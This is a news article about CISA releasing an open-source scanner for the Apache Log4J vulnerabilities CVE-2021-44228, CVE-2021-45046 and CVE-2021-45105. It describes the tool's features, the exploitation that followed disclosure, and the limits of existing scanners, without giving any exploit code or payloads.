The U.S. Cybersecurity and Infrastructure Security Agency (CISA) has released a scanner that can be used to identify web services affected by the two recently disclosed Apache Log4J remote code execution vulnerabilities CVE-2021-44228 (Log4Shell) and CVE-2021-45046, which have been fixed, along with a further DoS vulnerability (CVE-2021-45105) in version 2.17.
The scanner – available on GitHub here – was assembled with help from the open source community and was updated by CISA through collaboration with the broader cybersecurity community. The tool includes a modified Log4J scanner that was developed by the cybersecurity company FullHunt, with assistance provided by Philipp Klaus, Moritz Bechler, and other members of the open source community.
The tool can be used to scan network hosts for exposure to the remote code execution vulnerabilities and to identify web application firewall bypasses that could be used by threat actors to achieve code execution. CISA said it supports DNS callback for vulnerability discovery and validation, provides fuzzing for HTTP POST Data parameters, fuzzing for JSON data parameters, and support for lists of URLs.
Shortly after the disclosure of the Log4Shell zero-day vulnerability a broad range of threat actors started scanning for vulnerable applications and cloud services and have been exploiting the flaw to gain access to networks for a variety of malicious purposes. CISA initially gave all Federal Civilian Executive Branch agencies until December 24 to patch the vulnerabilities and has released mitigation guidance on addressing all three vulnerabilities to prevent exploitation.
Several other Log4J vulnerabilities scanners have been released, including the CrowdStrike Archive Scan Tool, although many of the scanners that have been made public have failed to identify all instances of Log4J, especially Log4Shell within packaged software in production environments, where Log4Shell can be hidden deep inside files. Using these tools can help to find vulnerable Log4J code, but there is no guarantee that all instances will be identified when using any one of these tools.